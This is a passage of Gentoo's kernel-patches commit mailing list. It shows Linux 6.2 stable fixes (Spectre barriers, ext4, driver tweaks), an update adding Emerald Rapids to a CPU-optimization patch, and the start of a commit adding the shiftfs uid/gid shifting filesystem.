+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index b8dc3b5c9ad94..9f506efa53705 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -480,6 +480,7 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ };
+ 
+ static const struct of_device_id mwifiex_sdio_of_match_table[] = {
++	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
+ 	{ .compatible = "marvell,sd8997" },
+ 	{ }
+diff --git a/drivers/platform/x86/amd/pmf/Kconfig b/drivers/platform/x86/amd/pmf/Kconfig
+index c375498c40717..6d89528c31779 100644
+--- a/drivers/platform/x86/amd/pmf/Kconfig
++++ b/drivers/platform/x86/amd/pmf/Kconfig
+@@ -6,6 +6,7 @@
+ config AMD_PMF
+ 	tristate "AMD Platform Management Framework"
+ 	depends on ACPI && PCI
++	depends on POWER_SUPPLY
+ 	select ACPI_PLATFORM_PROFILE
+ 	help
+ 	  This driver provides support for the AMD Platform Management Framework.
+diff --git a/drivers/platform/x86/nvidia-wmi-ec-backlight.c b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+index baccdf6585382..1b572c90c76ec 100644
+--- a/drivers/platform/x86/nvidia-wmi-ec-backlight.c
++++ b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+@@ -12,6 +12,10 @@
+ #include <linux/wmi.h>
+ #include <acpi/video.h>
+ 
++static bool force;
++module_param(force, bool, 0444);
++MODULE_PARM_DESC(force, "Force loading (disable acpi_backlight=xxx checks");
++
+ /**
+  * wmi_brightness_notify() - helper function for calling WMI-wrapped ACPI method
+  * @w:    Pointer to the struct wmi_device identified by %WMI_BRIGHTNESS_GUID
+@@ -91,7 +95,7 @@ static int nvidia_wmi_ec_backlight_probe(struct wmi_device *wdev, const void *ct
+ 	int ret;
+ 
+ 	/* drivers/acpi/video_detect.c also checks that SOURCE == EC */
+-	if (acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
++	if (!force && acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
+ 		return -ENODEV;
+ 
+ 	/*
+diff --git a/fs/ext4/sysfs.c b/fs/ext4/sysfs.c
+index d233c24ea3425..e2b8b3437c589 100644
+--- a/fs/ext4/sysfs.c
++++ b/fs/ext4/sysfs.c
+@@ -491,6 +491,11 @@ static void ext4_sb_release(struct kobject *kobj)
+ 	complete(&sbi->s_kobj_unregister);
+ }
+ 
++static void ext4_feat_release(struct kobject *kobj)
++{
++	kfree(kobj);
++}
++
+ static const struct sysfs_ops ext4_attr_ops = {
+ 	.show	= ext4_attr_show,
+ 	.store	= ext4_attr_store,
+@@ -505,7 +510,7 @@ static struct kobj_type ext4_sb_ktype = {
+ static struct kobj_type ext4_feat_ktype = {
+ 	.default_groups = ext4_feat_groups,
+ 	.sysfs_ops	= &ext4_attr_ops,
+-	.release	= (void (*)(struct kobject *))kfree,
++	.release	= ext4_feat_release,
+ };
+ 
+ void ext4_notify_error_sysfs(struct ext4_sb_info *sbi)
+diff --git a/include/linux/nospec.h b/include/linux/nospec.h
+index c1e79f72cd892..9f0af4f116d98 100644
+--- a/include/linux/nospec.h
++++ b/include/linux/nospec.h
+@@ -11,6 +11,10 @@
+ 
+ struct task_struct;
+ 
++#ifndef barrier_nospec
++# define barrier_nospec() do { } while (0)
++#endif
++
+ /**
+  * array_index_mask_nospec() - generate a ~0 mask when index < size, 0 otherwise
+  * @index: array element index
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index ba3fff17e2f9f..f9c3b1033ec39 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -34,6 +34,7 @@
+ #include <linux/log2.h>
+ #include <linux/bpf_verifier.h>
+ #include <linux/nodemask.h>
++#include <linux/nospec.h>
+ #include <linux/bpf_mem_alloc.h>
+ 
+ #include <asm/barrier.h>
+@@ -1910,9 +1911,7 @@ out:
+ 		 * reuse preexisting logic from Spectre v1 mitigation that
+ 		 * happens to produce the required code on x86 for v4 as well.
+ 		 */
+-#ifdef CONFIG_X86
+ 		barrier_nospec();
+-#endif
+ 		CONT;
+ #define LDST(SIZEOP, SIZE)						\
+ 	STX_MEM_##SIZEOP:						\
+diff --git a/lib/usercopy.c b/lib/usercopy.c
+index 1505a52f23a01..d29fe29c68494 100644
+--- a/lib/usercopy.c
++++ b/lib/usercopy.c
+@@ -3,6 +3,7 @@
+ #include <linux/fault-inject-usercopy.h>
+ #include <linux/instrumented.h>
+ #include <linux/uaccess.h>
++#include <linux/nospec.h>
+ 
+ /* out-of-line parts */
+ 
+@@ -12,6 +13,12 @@ unsigned long _copy_from_user(void *to, const void __user *from, unsigned long n
+ 	unsigned long res = n;
+ 	might_fault();
+ 	if (!should_fail_usercopy() && likely(access_ok(from, n))) {
++		/*
++		 * Ensure that bad access_ok() speculation will not
++		 * lead to nasty side effects *after* the copy is
++		 * finished:
++		 */
++		barrier_nospec();
+ 		instrument_copy_from_user_before(to, from, n);
+ 		res = raw_copy_from_user(to, from, n);
+ 		instrument_copy_from_user_after(to, from, n, res);
+diff --git a/security/Kconfig.hardening b/security/Kconfig.hardening
+index 53baa95cb644f..0f295961e7736 100644
+--- a/security/Kconfig.hardening
++++ b/security/Kconfig.hardening
+@@ -281,6 +281,9 @@ endmenu
+ 
+ config CC_HAS_RANDSTRUCT
+ 	def_bool $(cc-option,-frandomize-layout-seed-file=/dev/null)
++	# Randstruct was first added in Clang 15, but it isn't safe to use until
++	# Clang 16 due to https://github.com/llvm/llvm-project/issues/60349
++	depends on !CC_IS_CLANG || CLANG_VERSION >= 160000
+ 
+ choice
+ 	prompt "Randomize layout of sensitive kernel structures"


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-26 17:30 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-02-26 17:30 UTC (permalink / raw
  To: gentoo-commits

commit:     8c1fb78fe361a6272a79e82f5da4d81fbc0407ed
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 26 17:29:05 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 26 17:29:05 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=8c1fb78f

Update CPU Optimization patch, add Emerald Rapids, update Sapphire Rapids

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 5010_enable-cpu-optimizations-universal.patch | 125 ++++++++++++++------------
 1 file changed, 69 insertions(+), 56 deletions(-)

diff --git a/5010_enable-cpu-optimizations-universal.patch b/5010_enable-cpu-optimizations-universal.patch
index 0841340b..7a1b717a 100644
--- a/5010_enable-cpu-optimizations-universal.patch
+++ b/5010_enable-cpu-optimizations-universal.patch
@@ -1,7 +1,6 @@
-From a0825feea3f100656d58446885b5f190284fd219
+From 70d4906b87983ed2ed5da78930a701625d881dd0 Mon Sep 17 00:00:00 2001
 From: graysky <therealgraysky@proton.me>
-Date: Fri, 4 Nov 2022 15:34:36 -0400
-Subject: [PATCH] more uarches for kernel 5.17+
+Date: Thu, 5 Jan 2023 14:29:37 -0500
 
 FEATURES
 This patch adds additional CPU options to the Linux kernel accessible under:
@@ -50,11 +49,12 @@ CPU-specific microarchitectures include:
 • Intel Xeon (Cascade Lake)
 • Intel Xeon (Cooper Lake)*
 • Intel 3rd Gen 10nm++ i3/i5/i7/i9-family (Tiger Lake)*
-• Intel 3rd Gen 10nm++ Xeon (Sapphire Rapids)‡
+• Intel 4th Gen 10nm++ Xeon (Sapphire Rapids)‡
 • Intel 11th Gen i3/i5/i7/i9-family (Rocket Lake)‡
 • Intel 12th Gen i3/i5/i7/i9-family (Alder Lake)‡
 • Intel 13th Gen i3/i5/i7/i9-family (Raptor Lake)§
 • Intel 14th Gen i3/i5/i7/i9-family (Meteor Lake)§
+• Intel 5th Gen 10nm++ Xeon (Emerald Rapids)§
 
 Notes: If not otherwise noted, gcc >=9.1 is required for support.
        *Requires gcc >=10.1 or clang >=10.0
@@ -99,20 +99,19 @@ REFERENCES
 3.  https://bugzilla.kernel.org/show_bug.cgi?id=77461
 4.  https://github.com/graysky2/kernel_gcc_patch/issues/15
 5.  http://www.linuxforge.net/docs/linux/linux-gcc.php
-
 ---
- arch/x86/Kconfig.cpu            | 416 ++++++++++++++++++++++++++++++--
- arch/x86/Makefile               |  43 +++-
- arch/x86/include/asm/vermagic.h |  72 ++++++
- 3 files changed, 514 insertions(+), 17 deletions(-)
+ arch/x86/Kconfig.cpu            | 427 ++++++++++++++++++++++++++++++--
+ arch/x86/Makefile               |  44 +++-
+ arch/x86/include/asm/vermagic.h |  74 ++++++
+ 3 files changed, 528 insertions(+), 17 deletions(-)
 
 diff --git a/arch/x86/Kconfig.cpu b/arch/x86/Kconfig.cpu
-index 542377cd419d..08d887d1220d 100644
+index 542377cd419d..f589971df2d3 100644
 --- a/arch/x86/Kconfig.cpu
 +++ b/arch/x86/Kconfig.cpu
 @@ -157,7 +157,7 @@ config MPENTIUM4
-
-
+ 
+ 
  config MK6
 -	bool "K6/K6-II/K6-III"
 +	bool "AMD K6/K6-II/K6-III"
@@ -121,7 +120,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD K6-family processor.  Enables use of
 @@ -165,7 +165,7 @@ config MK6
  	  flags to GCC.
-
+ 
  config MK7
 -	bool "Athlon/Duron/K7"
 +	bool "AMD Athlon/Duron/K7"
@@ -130,7 +129,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD Athlon K7-family processor.  Enables use of
 @@ -173,12 +173,106 @@ config MK7
  	  flags to GCC.
-
+ 
  config MK8
 -	bool "Opteron/Athlon64/Hammer/K8"
 +	bool "AMD Opteron/Athlon64/Hammer/K8"
@@ -138,7 +137,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD Opteron or Athlon64 Hammer-family processor.
  	  Enables use of some extended instructions, and passes appropriate
  	  optimization flags to GCC.
-
+ 
 +config MK8SSE3
 +	bool "AMD Opteron/Athlon64/Hammer/K8 with SSE3"
 +	help
@@ -227,7 +226,7 @@ index 542377cd419d..08d887d1220d 100644
 +
 +config MZEN4
 +	bool "AMD Zen 4"
-+	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 160000)
 +	help
 +	  Select this for AMD Family 19h Zen 4 processors.
 +
@@ -238,26 +237,26 @@ index 542377cd419d..08d887d1220d 100644
  	depends on X86_32
 @@ -270,7 +364,7 @@ config MPSC
  	  in /proc/cpuinfo. Family 15 is an older Xeon, Family 6 a newer one.
-
+ 
  config MCORE2
 -	bool "Core 2/newer Xeon"
 +	bool "Intel Core 2"
  	help
-
+ 
  	  Select this for Intel Core 2 and newer Core 2 Xeons (Xeon 51xx and
 @@ -278,6 +372,8 @@ config MCORE2
  	  family in /proc/cpuinfo. Newer ones have 6 and older ones 15
  	  (not a typo)
-
+ 
 +	  Enables -march=core2
 +
  config MATOM
  	bool "Intel Atom"
  	help
-@@ -287,6 +383,202 @@ config MATOM
+@@ -287,6 +383,212 @@ config MATOM
  	  accordingly optimized code. Use a recent GCC with specific Atom
  	  support in order to fully benefit from selecting this option.
-
+ 
 +config MNEHALEM
 +	bool "Intel Nehalem"
 +	select X86_P6_NOP
@@ -410,7 +409,7 @@ index 542377cd419d..08d887d1220d 100644
 +	select X86_P6_NOP
 +	help
 +
-+	  Select this for third-generation 10 nm process processors in the Sapphire Rapids family.
++	  Select this for fourth-generation 10 nm process processors in the Sapphire Rapids family.
 +
 +	  Enables -march=sapphirerapids
 +
@@ -453,14 +452,24 @@ index 542377cd419d..08d887d1220d 100644
 +	  Select this for fourteenth-generation processors in the Meteor Lake family.
 +
 +	  Enables -march=meteorlake
++
++config MEMERALDRAPIDS
++	bool "Intel Emerald Rapids"
++	depends on (CC_IS_GCC && GCC_VERSION > 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	select X86_P6_NOP
++	help
++
++	  Select this for fifth-generation 10 nm process processors in the Emerald Rapids family.
++
++	  Enables -march=emeraldrapids
 +
  config GENERIC_CPU
  	bool "Generic-x86-64"
  	depends on X86_64
-@@ -294,6 +586,50 @@ config GENERIC_CPU
+@@ -294,6 +596,50 @@ config GENERIC_CPU
  	  Generic x86-64 CPU.
  	  Run equally well on all x86-64 CPUs.
-
+ 
 +config GENERIC_CPU2
 +	bool "Generic-x86-64-v2"
 +	depends on (CC_IS_GCC && GCC_VERSION > 110000) || (CC_IS_CLANG && CLANG_VERSION >= 120000)
@@ -506,9 +515,9 @@ index 542377cd419d..08d887d1220d 100644
 +	  Enables -march=native
 +
  endchoice
-
+ 
  config X86_GENERIC
-@@ -318,9 +654,17 @@ config X86_INTERNODE_CACHE_SHIFT
+@@ -318,9 +664,17 @@ config X86_INTERNODE_CACHE_SHIFT
  config X86_L1_CACHE_SHIFT
  	int
  	default "7" if MPENTIUM4 || MPSC
@@ -519,23 +528,23 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL \
 +	|| MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
 +	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE \
-+	|| MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 || GENERIC_CPU3 \
-+	|| GENERIC_CPU4
++	|| MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 \
++	|| GENERIC_CPU3 || GENERIC_CPU4
  	default "4" if MELAN || M486SX || M486 || MGEODEGX1
 -	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
 +	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII \
 +	|| MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
-
+ 
  config X86_F00F_BUG
  	def_bool y
-@@ -332,15 +676,27 @@ config X86_INVD_BUG
-
+@@ -332,15 +686,27 @@ config X86_INVD_BUG
+ 
  config X86_ALIGNMENT_16
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC || M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
 +	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC \
 +	|| M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
-
+ 
  config X86_INTEL_USERCOPY
  	def_bool y
 -	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2
@@ -543,8 +552,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MK8 || MK7 || MEFFICEON || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
-+	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL
-
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL
+ 
  config X86_USE_PPRO_CHECKSUM
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM
@@ -555,11 +564,11 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE \
 +	|| MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE \
 +	|| MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
-+	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
-
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
+ 
  #
  # P6_NOPs are a relatively minor optimization that require a family >=
-@@ -356,32 +712,62 @@ config X86_USE_PPRO_CHECKSUM
+@@ -356,32 +722,63 @@ config X86_USE_PPRO_CHECKSUM
  config X86_P6_NOP
  	def_bool y
  	depends on X86_64
@@ -567,8 +576,9 @@ index 542377cd419d..08d887d1220d 100644
 +	depends on (MCORE2 || MPENTIUM4 || MPSC || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE \
 +	|| MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE \
-+	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL)
-
++	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
++	|| MNATIVE_INTEL)
+ 
  config X86_TSC
  	def_bool y
 -	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM) || X86_64
@@ -578,9 +588,9 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM \
 +	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL \
 +	|| MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
-+	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL \
-+	|| MNATIVE_AMD) || X86_64
-
++	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
++	|| MNATIVE_INTEL || MNATIVE_AMD) || X86_64
+ 
  config X86_CMPXCHG64
  	def_bool y
 -	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8
@@ -590,8 +600,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS \
 +	|| MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE \
 +	|| MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
-+	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
-
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
+ 
  # this should be set for all -march=.. options where the compiler
  # generates cmov.
  config X86_CMOV
@@ -603,8 +613,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
-+	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD)
-
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD)
+ 
  config X86_MINIMUM_CPU_FAMILY
  	int
  	default "64" if X86_64
@@ -619,20 +629,20 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MNATIVE_INTEL || MNATIVE_AMD)
  	default "5" if X86_32 && X86_CMPXCHG64
  	default "4"
-
+ 
  config X86_DEBUGCTLMSR
  	def_bool y
 -	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 || M486SX || M486) && !UML
 +	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 \
 +	|| M486SX || M486) && !UML
-
+ 
  config IA32_FEAT_CTL
  	def_bool y
 diff --git a/arch/x86/Makefile b/arch/x86/Makefile
-index bafbd905e6e7..7fae52788560 100644
+index 415a5d138de4..17b1e039d955 100644
 --- a/arch/x86/Makefile
 +++ b/arch/x86/Makefile
-@@ -150,8 +150,47 @@ else
+@@ -151,8 +151,48 @@ else
          # FIXME - should be integrated in Makefile.cpu (Makefile_32.cpu)
          cflags-$(CONFIG_MK8)		+= -march=k8
          cflags-$(CONFIG_MPSC)		+= -march=nocona
@@ -676,17 +686,18 @@ index bafbd905e6e7..7fae52788560 100644
 +        cflags-$(CONFIG_MALDERLAKE) 	+= -march=alderlake
 +        cflags-$(CONFIG_MRAPTORLAKE) 	+= -march=raptorlake
 +        cflags-$(CONFIG_MMETEORLAKE) 	+= -march=meteorlake
++        cflags-$(CONFIG_MEMERALDRAPIDS)	+= -march=emeraldrapids
 +        cflags-$(CONFIG_GENERIC_CPU2) 	+= -march=x86-64-v2
 +        cflags-$(CONFIG_GENERIC_CPU3) 	+= -march=x86-64-v3
 +        cflags-$(CONFIG_GENERIC_CPU4) 	+= -march=x86-64-v4
          cflags-$(CONFIG_GENERIC_CPU)	+= -mtune=generic
          KBUILD_CFLAGS += $(cflags-y)
-
+ 
 diff --git a/arch/x86/include/asm/vermagic.h b/arch/x86/include/asm/vermagic.h
-index 75884d2cdec3..18021e8c0c28 100644
+index 75884d2cdec3..02c1386eb653 100644
 --- a/arch/x86/include/asm/vermagic.h
 +++ b/arch/x86/include/asm/vermagic.h
-@@ -17,6 +17,52 @@
+@@ -17,6 +17,54 @@
  #define MODULE_PROC_FAMILY "586MMX "
  #elif defined CONFIG_MCORE2
  #define MODULE_PROC_FAMILY "CORE2 "
@@ -736,10 +747,12 @@ index 75884d2cdec3..18021e8c0c28 100644
 +#define MODULE_PROC_FAMILY "RAPTORLAKE "
 +#elif defined CONFIG_MMETEORLAKE
 +#define MODULE_PROC_FAMILY "METEORLAKE "
++#elif defined CONFIG_MEMERALDRAPIDS
++#define MODULE_PROC_FAMILY "EMERALDRAPIDS "
  #elif defined CONFIG_MATOM
  #define MODULE_PROC_FAMILY "ATOM "
  #elif defined CONFIG_M686
-@@ -35,6 +81,32 @@
+@@ -35,6 +83,32 @@
  #define MODULE_PROC_FAMILY "K7 "
  #elif defined CONFIG_MK8
  #define MODULE_PROC_FAMILY "K8 "
@@ -772,5 +785,5 @@ index 75884d2cdec3..18021e8c0c28 100644
  #elif defined CONFIG_MELAN
  #define MODULE_PROC_FAMILY "ELAN "
  #elif defined CONFIG_MCRUSOE
---
-2.38.1
+-- 
+2.39.0


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-26 17:26 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-02-26 17:26 UTC (permalink / raw
  To: gentoo-commits

commit:     0f791c8b0640beaa02f75db270404c0d81ae7ec4
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 26 17:18:48 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 26 17:24:08 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0f791c8b

Add shiftfs

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                       |    4 +
 5000_shiftfs-6.2-2023-01-31.patch | 6607 +++++++++++++++++++++++++++++++++++++
 2 files changed, 6611 insertions(+)

diff --git a/0000_README b/0000_README
index 46624397..ae528a67 100644
--- a/0000_README
+++ b/0000_README
@@ -83,6 +83,10 @@ Patch:  4567_distro-Gentoo-Kconfig.patch
 From:   Tom Wijsman <TomWij@gentoo.org>
 Desc:   Add Gentoo Linux support config settings and defaults.
 
+Patch:  5000_shiftfs-6.2-2023-01-31.patch
+From:   https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/unstable
+Desc:   Kernel module that provides a kernel filesystem for uid/gid shifting
+
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.

diff --git a/5000_shiftfs-6.2-2023-01-31.patch b/5000_shiftfs-6.2-2023-01-31.patch
new file mode 100644
index 00000000..44603abb
--- /dev/null
+++ b/5000_shiftfs-6.2-2023-01-31.patch
@@ -0,0 +1,6607 @@
+From b554e3101fdc94969141491a4234b3c931683b5c Mon Sep 17 00:00:00 2001
+From: James Bottomley <James.Bottomley@HansenPartnership.com>
+Date: Thu, 4 Apr 2019 15:39:11 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: uid/gid shifting bind mount
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+This allows any subtree to be uid/gid shifted and bound elsewhere.  It
+does this by operating simlarly to overlayfs.  Its primary use is for
+shifting the underlying uids of filesystems used to support
+unpriviliged (uid shifted) containers.  The usual use case here is
+that the container is operating with an uid shifted unprivileged root
+but sometimes needs to make use of or work with a filesystem image
+that has root at real uid 0.
+
+The mechanism is to allow any subordinate mount namespace to mount a
+shiftfs filesystem (by marking it FS_USERNS_MOUNT) but only allowing
+it to mount marked subtrees (using the -o mark option as root).  Once
+mounted, the subtree is mapped via the super block user namespace so
+that the interior ids of the mounting user namespace are the ids
+written to the filesystem.
+
+Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
+[ saf: use designated initializers for path declarations to fix errors
+  with struct randomization ]
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+[update: port to 5.0]
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/Kconfig                 |   8 +
+ fs/Makefile                |   1 +
+ fs/shiftfs.c               | 780 +++++++++++++++++++++++++++++++++++++
+ include/uapi/linux/magic.h |   2 +
+ 4 files changed, 791 insertions(+)
+ create mode 100644 fs/shiftfs.c
+
+diff --git a/fs/Kconfig b/fs/Kconfig
+index 2685a4d0d353..b53bece1e940 100644
+--- a/fs/Kconfig
++++ b/fs/Kconfig
+@@ -128,6 +128,14 @@ source "fs/autofs/Kconfig"
+ source "fs/fuse/Kconfig"
+ source "fs/overlayfs/Kconfig"
+ 
++config SHIFT_FS
++	tristate "UID/GID shifting overlay filesystem for containers"
++	help
++	  This filesystem can overlay any mounted filesystem and shift
++	  the uid/gid the files appear at.  The idea is that
++	  unprivileged containers can use this to mount root volumes
++	  using this technique.
++
+ menu "Caches"
+ 
+ source "fs/netfs/Kconfig"
+diff --git a/fs/Makefile b/fs/Makefile
+index 4dea17840761..628632dcb9b1 100644
+--- a/fs/Makefile
++++ b/fs/Makefile
+@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
+ obj-$(CONFIG_EROFS_FS)		+= erofs/
+ obj-$(CONFIG_VBOXSF_FS)		+= vboxsf/
+ obj-$(CONFIG_ZONEFS_FS)		+= zonefs/
++obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+new file mode 100644
+index 000000000000..f7cada126daa
+--- /dev/null
++++ b/fs/shiftfs.c
+@@ -0,0 +1,780 @@
++#include <linux/cred.h>
++#include <linux/mount.h>
